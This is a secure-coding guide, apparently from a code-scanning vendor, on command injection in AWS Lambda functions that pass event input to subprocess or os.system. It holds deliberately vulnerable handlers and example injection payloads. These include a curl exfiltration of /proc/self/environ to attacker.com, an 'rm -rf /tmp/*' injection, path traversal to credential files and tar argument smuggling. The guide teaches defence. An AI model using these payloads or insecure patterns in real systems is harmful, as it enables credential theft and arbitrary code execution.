Python AWS Lambda Dangerous Subprocess Usage

Critical Risk Command Injection
pythonaws-lambdasubprocesscommand-injectionserverlesscode-execution

What it is

The AWS Lambda function uses the subprocess module to execute system commands with user-controlled input, potentially leading to command injection vulnerabilities. In the serverless environment, this can allow attackers to execute arbitrary commands, access AWS metadata, or compromise the Lambda execution environment.

# Vulnerable: Dangerous subprocess usage in Lambda import subprocess import os import json def lambda_handler(event, context): # Dangerous: Direct user input in subprocess filename = event.get('filename', '') # Extremely dangerous: Command injection possible result = subprocess.run(f"ls -la {filename}", shell=True, capture_output=True, text=True) return { 'statusCode': 200, 'body': json.dumps({ 'output': result.stdout, 'error': result.stderr }) } # Another vulnerable pattern def process_file(event, context): file_path = event['file_path'] command = event.get('command', 'cat') # Dangerous: User controls both command and arguments cmd = f"{command} {file_path}" try: output = subprocess.check_output(cmd, shell=True, text=True) return {'result': output} except subprocess.CalledProcessError as e: return {'error': str(e)} # Converting files with user input def convert_document(event, context): input_file = event['input_file'] output_format = event['output_format'] # Dangerous: Potential command injection convert_cmd = f"pandoc {input_file} -t {output_format}" os.system(convert_cmd) # Very dangerous return {'status': 'converted'}
# Secure: Safe alternatives to subprocess in Lambda import subprocess import json import re import boto3 from pathlib import Path # Use AWS services instead of shell commands def lambda_handler(event, context): filename = event.get('filename', '') # Validate filename if not is_safe_filename(filename): return { 'statusCode': 400, 'body': json.dumps({'error': 'Invalid filename'}) } # Secure: Use AWS S3 API instead of shell commands s3_client = boto3.client('s3') bucket_name = os.environ['BUCKET_NAME'] try: # List objects with prefix (safe S3 operation) response = s3_client.list_objects_v2( Bucket=bucket_name, Prefix=filename ) files = [obj['Key'] for obj in response.get('Contents', [])] return { 'statusCode': 200, 'body': json.dumps({'files': files}) } except Exception as e: return { 'statusCode': 500, 'body': json.dumps({'error': 'Failed to list files'}) } def is_safe_filename(filename): # Validate filename format if not filename or len(filename) > 255: return False # Only allow alphanumeric, dots, hyphens, underscores if not re.match(r'^[a-zA-Z0-9._-]+$', filename): return False # Prevent directory traversal if '..' in filename or filename.startswith('/'): return False return True # Secure file processing with validation def process_file_secure(event, context): file_key = event.get('file_key', '') operation = event.get('operation', '') # Validate inputs if not is_safe_filename(file_key): return {'error': 'Invalid file key'} allowed_operations = ['read', 'metadata', 'exists'] if operation not in allowed_operations: return {'error': 'Operation not allowed'} # Use AWS services instead of subprocess s3_client = boto3.client('s3') bucket_name = os.environ['BUCKET_NAME'] try: if operation == 'read': response = s3_client.get_object(Bucket=bucket_name, Key=file_key) content = response['Body'].read().decode('utf-8') return {'content': content[:1000]} # Limit output elif operation == 'metadata': response = s3_client.head_object(Bucket=bucket_name, Key=file_key) return { 'size': response['ContentLength'], 'last_modified': response['LastModified'].isoformat(), 'content_type': response.get('ContentType', 'unknown') } elif operation == 'exists': try: s3_client.head_object(Bucket=bucket_name, Key=file_key) return {'exists': True} except s3_client.exceptions.NoSuchKey: return {'exists': False} except Exception as e: return {'error': 'Operation failed'} # When subprocess is absolutely necessary (rare cases) def secure_subprocess_example(event, context): # Validate that subprocess is needed if not os.environ.get('ALLOW_SUBPROCESS'): return {'error': 'Subprocess not allowed in this environment'} command_type = event.get('command_type', '') # Use allowlist of commands allowed_commands = { 'date': ['/bin/date'], 'whoami': ['/usr/bin/whoami'], 'pwd': ['/bin/pwd'] } if command_type not in allowed_commands: return {'error': 'Command not allowed'} try: # Secure: Use argument list, no shell=True result = subprocess.run( allowed_commands[command_type], capture_output=True, text=True, timeout=5, # Prevent hanging shell=False # Critical: No shell interpretation ) if result.returncode != 0: return {'error': 'Command failed'} return { 'output': result.stdout.strip()[:500] # Limit output } except subprocess.TimeoutExpired: return {'error': 'Command timeout'} except Exception as e: return {'error': 'Command execution failed'} # Alternative: Use Lambda layers for tools def process_with_lambda_layer(event, context): """ Instead of using subprocess, install tools in Lambda layers and use Python libraries or AWS services """ file_content = event.get('content', '') # Use Python libraries instead of shell commands import base64 import hashlib # Process content with Python libraries encoded_content = base64.b64encode(file_content.encode()).decode() content_hash = hashlib.sha256(file_content.encode()).hexdigest() return { 'encoded': encoded_content, 'hash': content_hash, 'length': len(file_content) }

💡 Why This Fix Works

See fix suggestions for detailed explanation.

Why it happens

AWS Lambda functions invoke subprocess module functions like subprocess.run(), subprocess.call(), subprocess.Popen(), or os.system() with data from Lambda event payloads, API Gateway requests, or other user-controlled sources, creating command injection vulnerabilities in serverless environments. Lambda event handlers that directly embed event parameters into shell commands enable attackers to execute arbitrary commands: subprocess.run(f"ls {event['filename']}", shell=True) allows command injection through the filename parameter. API Gateway integrations that pass query parameters, path parameters, or request bodies to Lambda functions frequently lack validation before these values reach subprocess calls, particularly in REST APIs where developers trust input validation to occur client-side. SQS, SNS, EventBridge, or S3 event triggers can contain attacker-controlled data: S3 object keys, SNS message attributes, or SQS message bodies may include malicious payloads that Lambda functions pass to subprocess without sanitization. Serverless architectures often treat Lambda functions as trusted execution contexts, leading developers to omit input validation under the mistaken assumption that internal AWS services provide trusted data. The stateless nature of Lambda functions encourages developers to use subprocess for file operations, format conversions, or data processing that could be handled by AWS services like S3, Textract, or Lambda layers. Lambda's ephemeral filesystem (/tmp directory) and limited execution environment prompt developers to use shell commands for quick file manipulations, inadvertently introducing command injection vectors.

Root causes

Using subprocess.call(), subprocess.run(), or os.system() with User Input

AWS Lambda functions invoke subprocess module functions like subprocess.run(), subprocess.call(), subprocess.Popen(), or os.system() with data from Lambda event payloads, API Gateway requests, or other user-controlled sources, creating command injection vulnerabilities in serverless environments. Lambda event handlers that directly embed event parameters into shell commands enable attackers to execute arbitrary commands: subprocess.run(f"ls {event['filename']}", shell=True) allows command injection through the filename parameter. API Gateway integrations that pass query parameters, path parameters, or request bodies to Lambda functions frequently lack validation before these values reach subprocess calls, particularly in REST APIs where developers trust input validation to occur client-side. SQS, SNS, EventBridge, or S3 event triggers can contain attacker-controlled data: S3 object keys, SNS message attributes, or SQS message bodies may include malicious payloads that Lambda functions pass to subprocess without sanitization. Serverless architectures often treat Lambda functions as trusted execution contexts, leading developers to omit input validation under the mistaken assumption that internal AWS services provide trusted data. The stateless nature of Lambda functions encourages developers to use subprocess for file operations, format conversions, or data processing that could be handled by AWS services like S3, Textract, or Lambda layers. Lambda's ephemeral filesystem (/tmp directory) and limited execution environment prompt developers to use shell commands for quick file manipulations, inadvertently introducing command injection vectors.

Constructing Shell Commands with String Concatenation or f-strings

Lambda function code builds shell commands through string concatenation or Python f-strings that embed user-controlled variables directly into command strings without escaping or validation, making command injection trivial for attackers. F-string patterns like f"convert {input_file} -o {output_file}" directly interpolate Lambda event parameters into commands where special shell characters (;, |, &&, $, backticks) enable command chaining: event['input_file'] = 'file.txt; curl attacker.com/exfil?data=$(cat /proc/self/environ)' injects commands to exfiltrate Lambda environment variables containing AWS credentials. String concatenation patterns concatenate command parts without considering injection: cmd = 'ffmpeg -i ' + video_url + ' output.mp4' allows attackers to inject -exec flags, output redirection, or command separators. Template substitution using percent-formatting or str.format() suffers from identical issues: 'grep "{}" {}'.format(pattern, filename) treats special characters in pattern or filename as shell metacharacters. Developers familiar with parameterized SQL queries fail to apply the same principles to shell commands, not recognizing that subprocess requires argument arrays rather than escaped strings to avoid injection. Lambda functions processing file paths from S3 events construct commands assuming object keys are benign filenames, but S3 allows arbitrary key names including shell metacharacters: subprocess.run(f'file {s3_key}', shell=True) is vulnerable when s3_key contains malicious payloads. JSON event parsing that extracts nested properties into variables maintains tainted data through the application logic: filename = event['body']['file']['name'] preserves injection payloads that reach subprocess calls.

Missing Input Validation Before Command Execution

Lambda functions execute subprocess commands without implementing input validation, sanitization, or allowlist checks on event parameters, trusting that upstream API Gateway validators, AWS WAF rules, or client-side validation prevent malicious input from reaching the Lambda execution environment. Developers rely on API Gateway request validation schemas that check data types and required fields but fail to validate content for command injection payloads: a schema requiring a string filename parameter doesn't prevent values like '; rm -rf /tmp/*'. AWS WAF rules configured to block common SQL injection patterns may miss command injection signatures specific to subprocess exploitation, particularly encoded or obfuscated payloads. Lambda functions that process data from internal AWS services (S3, DynamoDB, SQS) often omit validation under the assumption that internal services provide trusted data, ignoring scenarios where attackers control S3 object keys, DynamoDB item attributes, or SQS message bodies through other application entry points. Serverless application developers focus on business logic implementation without security context, lacking awareness of command injection risks particularly in Lambda environments where subprocess seems isolated from traditional web application attack vectors. Inadequate error handling that catches subprocess exceptions without logging input parameters prevents detection of injection attempts, allowing attackers to probe command syntax iteratively. IAM policies and execution roles that grant Lambda functions broad permissions (s3:*, dynamodb:*, ec2:*) compound command injection risks by enabling injected commands to leverage AWS CLI tools present in Lambda runtime environments to access sensitive resources or escalate privileges.

Using shell=True Without Proper Input Sanitization

Lambda function developers invoke subprocess functions with shell=True parameter to simplify command construction or enable shell features like pipes, wildcards, and environment variable expansion, creating command injection vulnerabilities by instructing Python to interpret commands through a shell rather than executing programs directly. The shell=True parameter causes subprocess to invoke /bin/sh -c "command", making the entire command string subject to shell parsing where special characters have semantic meaning: semicolons separate commands, pipes chain processes, backticks or $() execute subshells, && and || provide conditional execution, and > redirects output. Developers use shell=True to construct complex command pipelines: subprocess.run(f'cat {file} | grep {pattern} | wc -l', shell=True) requires shell=True for pipe functionality but makes file and pattern parameters injection vectors. Lambda runtime environments include /bin/sh and common utilities (curl, wget, base64, nc) that attackers leverage through injected commands to exfiltrate data, establish reverse shells, or probe AWS metadata service at 169.254.169.254 to steal temporary credentials. The Python subprocess documentation warns against shell=True with untrusted input, but serverless developers misinterpret Lambda's isolated execution context as providing inherent security, not recognizing that command injection occurs within the Lambda container before any AWS security controls. Shell metacharacter escaping using shlex.quote() or manual escaping is fragile and error-prone: developers often miss escaping all injection points or fail to handle edge cases, while shell=False with argument lists eliminates injection vectors entirely.

Processing User-Provided File Paths or Command Arguments Unsafely

Lambda functions accept file paths, command arguments, or executable names from Lambda events and pass them to subprocess without validating format, restricting to safe character sets, or checking for directory traversal and shell metacharacters, enabling both command injection and unintended file access. S3 event notifications trigger Lambda functions with object keys that developers pass directly to subprocess: subprocess.run(['file', event['Records'][0]['s3']['object']['key']], shell=False) seems safe with shell=False but fails if the Lambda function later uses the key in string formatting. API Gateway file upload handlers that receive multipart/form-data filenames pass these names to subprocess for processing, virus scanning, or format detection: user-controlled filenames containing spaces, quotes, or special characters cause unexpected command behavior even without shell=True. Lambda functions implementing image processing, document conversion, or media transcoding receive user-specified output formats, compression levels, or encoding parameters that become subprocess arguments: subprocess.run(['ffmpeg', '-i', input_file, '-f', output_format]) is vulnerable if output_format = 'mp4 -exec malicious_command' injects additional arguments. Directory traversal in file paths combined with subprocess enables attackers to read arbitrary files from Lambda's filesystem: file_path = '../../proc/self/environ' passed to subprocess.run(['cat', file_path]) exposes environment variables containing AWS credentials. Executable names in subprocess calls sourced from user input allow attackers to invoke unintended binaries: subprocess.run([event['tool'], '--version']) enables execution of arbitrary Lambda runtime commands like curl, python, or aws if the tool parameter isn't validated against an allowlist.

Fixes

1

Avoid subprocess Calls Entirely in Lambda Functions Whenever Possible

Eliminate subprocess usage from AWS Lambda functions by redesigning application architecture to leverage native AWS services, Python libraries, or Lambda layers that provide required functionality without shell command execution. Replace shell commands for file operations with boto3 S3 operations: instead of subprocess.run(['aws', 's3', 'cp']), use s3_client.download_file(), s3_client.upload_file(), or s3_client.copy_object() for safe, parameterized S3 interactions. For data transformations, use Python libraries rather than command-line tools: replace imagemagick subprocess calls with Pillow (PIL), replace ffmpeg with moviepy or av libraries, replace pandoc with pypandoc that wraps the binary safely. Implement business logic in Python code rather than invoking shell scripts: refactor bash scripts into Python functions that use AWS SDK, avoiding subprocess entirely. For text processing that might use grep, sed, or awk via subprocess, use Python's built-in re module, string methods, or libraries like pandas for structured data processing. When Lambda functions need to interact with external systems, use boto3 to invoke other Lambda functions via lambda_client.invoke(), trigger Step Functions state machines, or publish SNS/SQS messages rather than using curl or wget through subprocess. Leverage AWS managed services for common operations: use AWS Textract instead of OCR subprocess tools, use AWS Transcribe instead of speech-to-text command-line utilities, use AWS Translate instead of subprocess translation tools. Document the rationale whenever subprocess appears necessary and evaluate whether Lambda is the appropriate compute service: consider ECS Fargate or AWS Batch for workloads requiring extensive shell command execution.

2

Use AWS SDK (boto3) and Managed Service APIs Instead of Shell Commands

Replace all shell command invocations with equivalent AWS SDK (boto3) operations or AWS service API calls that provide type-safe, parameterized interfaces immune to command injection vulnerabilities. For S3 operations, use boto3 S3 client methods: list_objects_v2() instead of 'aws s3 ls', get_object() instead of 'aws s3 cp', put_object() instead of file writing with subprocess. For DynamoDB operations, use boto3 DynamoDB resource or client: table.query(), table.scan(), table.put_item() provide safe data access without shell command construction. For Lambda orchestration, use lambda_client.invoke() to call other Lambda functions with JSON payloads: response = lambda_client.invoke(FunctionName='other-function', Payload=json.dumps(event)) safely chains Lambda functions without subprocess. For SQS message processing, use sqs_client.send_message(), receive_message(), and delete_message() instead of AWS CLI subprocess calls. For Systems Manager Parameter Store or Secrets Manager, use ssm_client.get_parameter() or secretsmanager_client.get_secret_value() to retrieve configuration or credentials instead of shell commands that expose values in process lists. For CloudWatch logging and metrics, use boto3 to put_log_events() and put_metric_data() instead of subprocess calls to AWS CLI. For file format detection, use Python libraries: python-magic for MIME type detection instead of 'file' command, PyPDF2 or pdfminer for PDF analysis instead of 'pdfinfo' subprocess. For compression operations, use Python's gzip, zipfile, or tarfile modules instead of subprocess calls to tar, gzip, or unzip commands. Configure boto3 clients with appropriate error handling, retry logic, and timeout settings to ensure reliability without subprocess fallbacks. Set IAM execution role permissions to grant Lambda functions only required AWS service permissions, applying least privilege principles.

3

Validate and Sanitize All Input Before Any subprocess Calls

Implement comprehensive input validation and sanitization for all Lambda event data before it reaches subprocess calls, using allowlists, format validation, character restrictions, and length limits to prevent command injection attacks. Define strict input schemas using JSON Schema and enforce them at Lambda function entry: validate that event parameters match expected types, formats, and value ranges before processing. Use allowlist validation for enumerated inputs: if event['operation'] not in ['read', 'write', 'delete']: raise ValueError('Invalid operation') ensures only permitted operations execute. Apply regular expression validation to restrict input to safe character sets: re.match(r'^[a-zA-Z0-9._-]+$', filename) permits only alphanumeric characters, dots, hyphens, and underscores in filenames, blocking shell metacharacters. Implement length limits on all string inputs to prevent buffer overflow conditions and limit attack payload size: if len(input_string) > 255: raise ValueError('Input too long'). Check for directory traversal patterns: if '..' in file_path or file_path.startswith('/'): raise ValueError('Invalid path') prevents path traversal attacks. Use Path from pathlib to normalize and validate file paths: Path(file_path).resolve().is_relative_to(safe_directory) ensures paths remain within permitted directories. Validate file extensions against allowlists: allowed_extensions = {'.txt', '.json', '.csv'}; if Path(filename).suffix not in allowed_extensions: raise ValueError('Invalid file type'). Sanitize input by removing dangerous characters: sanitized = re.sub(r'[^a-zA-Z0-9]', '', user_input) strips non-alphanumeric characters. Log all validation failures with input samples (truncated and sanitized) to CloudWatch for security monitoring and incident response. Raise exceptions for validation failures rather than proceeding with sanitized values that might be unusable or still dangerous.

4

Use subprocess with shell=False and Argument Lists

When subprocess usage is unavoidable in Lambda functions, always use shell=False (the default) and pass commands as argument lists rather than strings to prevent shell interpretation of metacharacters and eliminate command injection vectors. Structure subprocess calls with argument lists where each argument is a separate list element: subprocess.run(['ls', '-la', directory], shell=False) passes arguments directly to the ls program without shell parsing. Never concatenate strings to build commands: avoid f-strings, str.format(), or + concatenation that embeds user input into command strings. Pass each command component as a distinct list element: subprocess.run([command, arg1, arg2, user_input], shell=False) treats user_input as a literal string argument rather than shell syntax. Even with shell=False, validate that user input cannot inject additional arguments to the invoked command: subprocess.run(['tar', '-czf', archive_name, user_file]) is vulnerable if user_file = '--exclude-from=/dev/null --add-file=/etc/passwd' injects tar arguments. Use absolute paths for executables to prevent PATH manipulation: subprocess.run(['/usr/bin/file', filename]) ensures the correct binary executes rather than a trojan in a user-controlled PATH. Implement timeout parameters to prevent Lambda function timeouts and excessive resource consumption: subprocess.run(command, timeout=5) raises TimeoutExpired if command runs beyond 5 seconds. Capture output safely using capture_output=True or explicit stdout/stderr handling: result = subprocess.run(command, capture_output=True, text=True) captures output for logging without displaying it to users. Never use subprocess.call() or os.system() which are more prone to misuse: prefer subprocess.run() with explicit parameters. Set environment variables explicitly with env parameter rather than inheriting Lambda's environment: subprocess.run(command, env={'PATH': '/usr/bin'}) provides a minimal clean environment.

5

Implement Allowlists for Permitted Commands and Arguments

Define and enforce strict allowlists that specify exactly which commands can be executed and what arguments are permitted, validating all subprocess invocations against these allowlists before execution to prevent arbitrary command execution. Create dictionaries mapping operation names to command arrays: ALLOWED_COMMANDS = {'list': ['/bin/ls', '-la'], 'date': ['/bin/date'], 'whoami': ['/usr/bin/whoami']} defines permitted operations with complete command syntax. Validate requested operations against allowlist keys: if operation not in ALLOWED_COMMANDS: raise ValueError(f'Operation {operation} not allowed') rejects unknown operations before subprocess calls. Prohibit user control of executable names: never allow event['command'] to determine which program executes; use predefined command mappings instead. For operations requiring user-provided arguments, validate arguments against allowlists: if file_extension not in ALLOWED_EXTENSIONS: raise ValueError('Invalid file extension') ensures only permitted file types are processed. Implement argument validation functions: validate_safe_path(path), validate_safe_filename(filename), validate_integer_argument(arg) provide reusable validation that checks arguments meet safety requirements. Use argument type conversion to enforce constraints: int(event['count']) ensures count is an integer, raising ValueError for non-numeric input before it reaches subprocess. Create configuration files or environment variables defining allowed commands: load ALLOWED_COMMANDS from SSM Parameter Store or environment variables rather than hardcoding, enabling operational control of permitted operations. Document why each allowed command is necessary and what security risks it presents: maintain a security review log justifying subprocess usage. Implement audit logging that records all subprocess invocations with command, arguments, execution result, and Lambda request ID to CloudWatch for security monitoring and forensics. Consider using AWS Lambda function versions and aliases to gradually roll out changes to allowed commands, enabling rapid rollback if security issues emerge.

6

Use Lambda Layers for Pre-installed Tools Instead of Dynamic Execution

Package required command-line tools, binaries, and dependencies into AWS Lambda layers that provide pre-compiled, version-controlled executables rather than dynamically constructing and executing commands at runtime with subprocess. Create Lambda layers containing compiled binaries like ImageMagick, FFmpeg, or custom tools: package binaries in layers with proper /opt directory structure, ensuring executables are available in Lambda runtime without subprocess-based installation. Install Python libraries that wrap command-line tools into Lambda layers: include libraries like Pillow, opencv-python, or pandas that provide Python APIs to functionality otherwise requiring shell commands. Use AWS-provided Lambda layers for common tools: AWS publishes layers for libraries and tools that can replace subprocess usage. Configure Lambda function execution to include necessary layers in the function's runtime environment: layers reduce deployment package size and provide shared dependencies across functions. Replace dynamic command construction with library function calls: instead of subprocess.run(['convert', input_img, '-resize', '800x600', output_img]), use Pillow: Image.open(input_img).resize((800, 600)).save(output_img). For tools requiring subprocess invocation, use layers to ensure consistent binary versions and paths: reference layer-provided executables via absolute paths like '/opt/bin/tool' rather than relying on PATH. Implement wrapper functions around layer-provided tools that enforce security constraints: create safe_image_resize(), safe_video_encode() functions that validate inputs, invoke layer tools safely, and handle errors consistently. Version Lambda layers to track tool updates and security patches: create new layer versions when updating binaries, enabling controlled rollout and rollback. Document layer contents, versions, and security considerations in Lambda function documentation and deployment templates. Use Infrastructure as Code (CloudFormation, Terraform, SAM) to define layer dependencies declaratively, ensuring consistent layer configuration across environments. Test layer functionality in isolated Lambda functions before deploying to production to verify that layer-provided tools work correctly and don't introduce vulnerabilities.

Detect This Vulnerability in Your Code

Sourcery automatically identifies python aws lambda dangerous subprocess usage and many other security issues in your codebase.